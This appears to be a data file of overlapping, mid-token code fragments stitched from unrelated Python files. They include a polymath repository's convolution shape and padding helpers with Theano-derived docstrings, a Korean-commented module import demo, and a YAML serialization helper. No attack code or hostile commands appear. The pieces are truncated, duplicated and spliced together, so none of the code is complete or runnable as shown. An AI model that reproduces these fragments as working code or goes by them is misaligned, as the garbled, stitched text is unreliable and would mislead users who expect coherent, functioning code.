_get_conv_shape_1axis( imshp[i], kshp[i],", "pad_down : int Padding size on down. pad_right : int Padding size on", "Padding size on down. pad_right : int Padding size on right. \"\"\" #", "= len(var.shape) assert len(strides) == n out_shape = () nz_indices = () shape_idx", "padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\"", "all_ops.append(idx) cnt += 1 for i in node_b.shape: if i in node_a.shape: idx", "imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i in range(len(subsample)) ) else: out_shp", "if out_node.is_shape_finalized(): all_ops = [] for s in out_node.shape: if s in node_a.shape:", "i in node_a.shape: if i == 1: op1.append(0) # all_ops.append(0) else: idx =", "* 2 # pad_w = pad_size[1] * 2 # elif len(pad_size) == 4:", "return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: # raise ValueError(\"Size of padding can", "and padded_out.shape != (1,): assert padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\" \\", "or 'full'. If it is a tuple, its two (or three) elements respectively", "node_b, out_node): # TODO: Figure out what to do about multiple dimensions with", "int Corresponds to the kernel shape on a given axis. border_mode: string or", "pad_size[3] # else: # raise ValueError(\"Size of padding can only be 2 or", "pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx", "must be 'valid' or 'full'. subsample: int. It must correspond to the subsampling", "tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure out", "isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for", "elements correspond respectively to the dilation on height and width axis. Returns -------", "pad_h - pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to get", "indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx =", "assert border_mode >= 0 pad_l = pad_r = border_mode # In case of", "to build the smallest graph # (image_shape + 2 * pad - dil_kernel_shape)", "def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx", "a_idx = [None] * len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map = {}", "for s in out_node.shape: if s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else:", "return idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices =", "pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] =", "assert len(strides) == n out_shape = () nz_indices = () shape_idx = ()", "is None: return dim if dim < 0: dim = len(a_shp) + dim", "= tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i in range(len(subsample))", "1 or a == b: pass else: return False return True # Use", "else: idx = pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt += 1 for", "1 b_idx[i] = 0 else: if node_a.shape == node_b.shape and node_c.shape == node_a.shape:", "- pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) ==", "elements must correspond respectively to : number of output channels, number of input", ">= 0 pad_l = pad_r = border_mode # In case of symbolic shape,", "number of input channels, height and width (and possibly depth) of the image.", "dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function compute the", "shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): # if isinstance(pad_size,", "b: pass else: return False return True # Use numpy broadcasting rules def", "= sidx for i in range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i] ==", "enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node):", "1 if out_node.is_shape_finalized(): all_ops = [] for s in out_node.shape: if s in", "node_b.shape[i] == 1 b_idx[i] = 0 else: if node_a.shape == node_b.shape and node_c.shape", "== 1 b_idx[i] = 0 else: if node_a.shape == node_b.shape and node_c.shape ==", "pad_size[1] * 2 # elif len(pad_size) == 4: # return pad_size[0], pad_size[2], pad_size[1],", "pm.index(0, x.shape[dim] - 1) return idx def _dim_explicit(a_shp, dim): if dim is None:", "idx = pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized():", "0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): #", "int. If it is a string, it must be 'valid' or 'full'. If", "0 for i in range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i] == 1", "------- out_shp: int corresponding to the output image shape on the considered axis.", "height and width (and possibly depth) of the kernel. For an unshared 2D", "output shape of convolution operation. Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters", "size Returns ------- pad_top : int Padding size on top pad_left : int", "nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else: small_node = node_a lg_node = node_b", "\"\"\"Common code to get the pad option Parameters ---------- padding : int or", "for s in shape]) return indices def _get_reduce_node_indices(a, b, output, axis): if output.shape", "and width (and possibly depth) of the kernel. For an unshared 2D convolution,", "Figure out what to do about multiple dimensions with the same value cnt", "where undefined. kernel_shape: tuple of int corresponding to the kernel shape. For a", "if s in node_b.shape: start = 0 if s in b_map: start =", "p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top +", "In case of symbolic shape, we want to build the smallest graph #", "kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i in range(len(subsample)) ) return (bsize, nkern)", "1) // 2 # pad_left = (pad_w + 1) // 2 # return", "- 1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1:", "kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i in range(len(subsample)) ) else: out_shp =", "p_right padded_shape = (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,):", "oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx", "= tuple([pm.index(0, s - 1) for s in output.shape]) return indices def is_broadcastable(shp1,", "2 pad_h = padding[0] * 2 pad_w = padding[1] * 2 pad_top =", "is a string, it must be 'valid' or 'full'. If it is a", "idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if", "None where undefined. border_mode: string, or tuple of int. If it is a", "<reponame>lite-david/polymath import polymath as pm import numpy as np def format_idx(x, reverse=True): if", "border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function compute the output shape of convolution", "= pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1 + 0 # STEP 1:", "(1,): assert padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\"", "or b == 1 or a == b: pass else: return False return", "* 2 pad_h = padding[0] * 2 pad_w = padding[1] * 2 pad_top", "# pad_h = pad_w = pad_size * 2 # # pad_top = (pad_h", "\"\"\" # Implicit dilated kernel shape dil_kernel_shape = (kernel_shape - 1) * dilation", "shape of convolution operation. Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ----------", "dimensions with the same value cnt = 0 op1 = [] op2 =", "shape of convolution operation. Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ----------", "out_idx.append(idx) elif node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if", "= node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for i in range(-1, -len(lg_node.shape)", "idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b) return idx,", "the kernel shape on a given axis. border_mode: string or int. If it", "range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i] == 1 a_idx[i] = 0 for", "shape: shape = node.shape indices = tuple([pm.index(0, s - 1) for s in", "output channels, height and width of the image. \"\"\" bsize, imshp = image_shape[0],", "a string, it must be 'valid' or 'full'. If it is a tuple,", "elif len(pad_size) == 4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: #", "2 # return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def get_pad_tuple(padding,", "- pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to get the pad option Parameters", "node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else: small_node = node_a lg_node =", "- 1) return idx def _dim_explicit(a_shp, dim): if dim is None: return dim", "dc in reversed(dim_combinations): idx = 0 idx_offset = 1 add_dim = 0 for", "the kernel. None where undefined. border_mode: string, or tuple of int. If it", "option Parameters ---------- padding : int or str Padding size, or ['VALID', 'SAME']", "= [None] * len(node_b.shape) a_map = {} b_map = {} for s in", "def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure out what to do about multiple", "in output.shape]) return indices def is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1], shp2[::-1]):", "a_idx[i] = 0 for i in range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i]", "tgt_shape != node.shape: for idx, i in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx,", "pm import numpy as np def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else:", "Use numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape)", "return True # Use numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable", "0) ): \"\"\"This function compute the output shape of convolution operation. Copied and", "format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx", "reverse: return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices = []", "image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function compute the output shape", "p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top + p_bottom", "as np def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else: return tuple(x) def", "+ 1) // 2 pad_left = (pad_w + 1) // 2 return pad_top,", "2 * pad - dil_kernel_shape) // subsample + 1 out_shp = image_shape -", "- 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1: idx", "axis. filter_dilation: tuple of int. Its two or three elements correspond respectively to", "nmap[\"large\"] = a_idx else: small_node = node_a lg_node = node_b nmap[\"small\"] = a_idx", "* 2 pad_top = (pad_h + 1) // 2 pad_left = (pad_w +", "- 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape)", "nmap[\"large\"] = b_idx for i in range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape)", "b_idx[sidx] = idx b_map[s] = sidx for i in range(len(a_idx)): if a_idx[i] is", "(for 3D convolution) elements must correspond respectively to : number of output channels,", "- 1) op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops = [] for", "kernel. For an unshared 2D convolution, its six channels must correspond to :", "of output channels, height and width of the image. \"\"\" bsize, imshp =", "width (and possibly depth) axis. subsample: tuple of int. Its two or three", "- dil_kernel_shape) // subsample + 1 out_shp = image_shape - dil_kernel_shape if pad_l", "= pad_size[0] * 2 # pad_w = pad_size[1] * 2 # elif len(pad_size)", "pad_l != 0: out_shp += pad_l if pad_r != 0: out_shp += pad_r", "s-1) src_indices.append(idx) # STEP 0: idx3*1 + 0 # STEP 1: idx3 +", "pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) == 4 p_top, p_bottom,", "in shape]) return indices def _get_reduce_node_indices(a, b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]:", "len(data.shape) == 4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2]", "2 # pad_left = (pad_w + 1) // 2 # return pad_top, pad_left,", "number of output channels, height and width of the output, number of input", "if i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0)", "= 0 for i in range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i] ==", "kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i],", "data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape == padded_out.shape,", "(tuple, list)): # if len(pad_size) == 2: # pad_h = pad_size[0] * 2", "padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set", "case of symbolic shape, we want to build the smallest graph # (image_shape", "[] nmap = {} reverse = True if not broadcastable: reverse = False", "a == b: pass else: return False return True # Use numpy broadcasting", "+= pad_r if subsample != 1: out_shp = out_shp // subsample out_shp =", "start) a_idx[sidx] = idx a_map[s] = sidx if s in node_b.shape: start =", "padding can only be 2 or 4\") # else: # assert isinstance(pad_size, int)", "p_bottom ow = data.shape[3] + p_left + p_right padded_shape = (data.shape[0], data.shape[1], oh,", "return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure out what to do", "shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx =", "pad_left, pad_h - pad_top, pad_w - pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size,", "= (pad_w + 1) // 2 return pad_top, pad_left, pad_h - pad_top, pad_w", "# STEP 1: idx3 + shape[3]* for dc in reversed(dim_combinations): idx = 0", "if dim < 0: dim = len(a_shp) + dim return dim def _get_conv_shape_1axis(", "+ 1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ):", "= len(a_shp) + dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1", "out what to do about multiple dimensions with the same value cnt =", "# TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i] -", "i - 1) op1.append(idx) all_ops.append(idx) cnt += 1 for i in node_b.shape: if", "the dilation on the considered axis. Returns ------- out_shp: int corresponding to the", "do about multiple dimensions with the same value cnt = 0 op1 =", "# def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): # if len(pad_size) == 2:" ]
[ "Lower directory 참조 def function_2(): print(\"function_2 of second module imported\") def call_function_in_first_module(): print(\"called", "import first_module # Upper directory 에서 Lower directory 참조 def function_2(): print(\"function_2 of", "경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools import first_module # Upper directory", "추가 from my_tools import first_module # Upper directory 에서 Lower directory 참조 def", "= os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) #", "function_2(): print(\"function_2 of second module imported\") def call_function_in_first_module(): print(\"called from second module to", "print(\"function_2 of second module imported\") def call_function_in_first_module(): print(\"called from second module to first", "from my_tools import first_module # Upper directory 에서 Lower directory 참조 def function_2():", "os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))", "# -*- coding: utf-8 -*- import os import sys EXE_PATH = os.getcwd() #", "UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools", "# 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools import first_module #", "first_module # Upper directory 에서 Lower directory 참조 def function_2(): print(\"function_2 of second", "module imported\") def call_function_in_first_module(): print(\"called from second module to first module\") first_module.function_1() if", "os import sys EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) #", "def function_2(): print(\"function_2 of second module imported\") def call_function_in_first_module(): print(\"called from second module", "utf-8 -*- import os import sys EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH", "스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가", "coding: utf-8 -*- import os import sys EXE_PATH = os.getcwd() # 실행 경로", "# 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) #", "-*- coding: utf-8 -*- import os import sys EXE_PATH = os.getcwd() # 실행", "SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH)", "#!/usr/bin/python3.5 # -*- coding: utf-8 -*- import os import sys EXE_PATH = os.getcwd()", "os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools import first_module", "directory 참조 def function_2(): print(\"function_2 of second module imported\") def call_function_in_first_module(): print(\"called from", "에서 Lower directory 참조 def function_2(): print(\"function_2 of second module imported\") def call_function_in_first_module():", "imported\") def call_function_in_first_module(): print(\"called from second module to first module\") first_module.function_1() if __name__", "-*- import os import sys EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH =", "# 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를", "sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools import first_module # Upper directory 에서", "# Upper directory 에서 Lower directory 참조 def function_2(): print(\"function_2 of second module", "실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위", "= os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools import", "def call_function_in_first_module(): print(\"called from second module to first module\") first_module.function_1() if __name__ ==", "상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools import first_module # Upper", "Upper directory 에서 Lower directory 참조 def function_2(): print(\"function_2 of second module imported\")", "경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from", "sys EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로", "directory 에서 Lower directory 참조 def function_2(): print(\"function_2 of second module imported\") def", "경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로", "# 상위 경로를 추가 from my_tools import first_module # Upper directory 에서 Lower", "of second module imported\") def call_function_in_first_module(): print(\"called from second module to first module\")", "my_tools import first_module # Upper directory 에서 Lower directory 참조 def function_2(): print(\"function_2", "call_function_in_first_module(): print(\"called from second module to first module\") first_module.function_1() if __name__ == \"__main__\":", "= os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH =", "EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH", "print(\"called from second module to first module\") first_module.function_1() if __name__ == \"__main__\": function_2()", "import sys EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트", "second module imported\") def call_function_in_first_module(): print(\"called from second module to first module\") first_module.function_1()", "os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위", "import os import sys EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__))", "상위 경로를 추가 from my_tools import first_module # Upper directory 에서 Lower directory", "참조 def function_2(): print(\"function_2 of second module imported\") def call_function_in_first_module(): print(\"called from second", "경로를 추가 from my_tools import first_module # Upper directory 에서 Lower directory 참조", "from second module to first module\") first_module.function_1() if __name__ == \"__main__\": function_2() call_function_in_first_module()" ]
[ "x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit')", "BaseLoader except ImportError: from yaml import SafeDumper as BaseDumper from yaml import SafeLoader", "def tag_map_repr(self, value): return self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str',", "yaml try: from yaml import CSafeDumper as BaseDumper from yaml import CSafeLoader as", "typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file,", "value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class", "elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode):", "import yaml try: from yaml import CSafeDumper as BaseDumper from yaml import CSafeLoader", "value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in", "Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with open(str(filename)) as", "typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader)", "Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node,", "return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self,", "yaml import SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__)", "CSafeDumper as BaseDumper from yaml import CSafeLoader as BaseLoader except ImportError: from yaml", "from yaml import SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir',", "def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ = type(tag, (object,), { '__init__':", "style='\"') class Loader(BaseLoader): pass class Statedir(object): pass # Formatting class List(list): pass class", "value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def quoted_repr(self, value):", "Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr,", "lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ,", "self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ", "sorted((k, Quoted(v)) for k, v in value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!'", "yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node):", "yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted,", "}) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,),", "typ = type(tag, (object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self,", "x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit')", "pass # Formatting class List(list): pass class Map(dict): pass class Quoted(str): pass class", "'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield", "in value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def quoted_repr(self,", "BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return", "k, v in value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' + value.__class__.__name__, value.__dict__)", "class Statedir(object): pass # Formatting class List(list): pass class Map(dict): pass class Quoted(str):", "yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map,", "= type(tag, (object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other:", "def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object): pass", "yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield", "unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ = type(tag, (object,), { '__init__': lambda", "return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else:", "self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ'))", "Quoted(v)) for k, v in value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' +", "**kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper)", "self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object): pass # Formatting class List(list):", "<gh_stars>1-10 import yaml try: from yaml import CSafeDumper as BaseDumper from yaml import", "yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {})", "if isinstance(node, yaml.MappingNode): typ = type(tag, (object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs),", "typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node,", "type(tag, (object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__", "as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value):", "v in value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def", "Formatting class List(list): pass class Map(dict): pass class Quoted(str): pass class Toplevel(dict): def", "other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode):", "Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node))", "{}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return", "return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data),", "class Quoted(str): pass class Toplevel(dict): def format(self): x = self.copy() yield 'kind', x.pop('kind')", "yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def", "'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v", "List(map(Quoted, x.pop('arguments'))) for k, v in x.items(): yield k, v yaml.add_representer(Statedir, 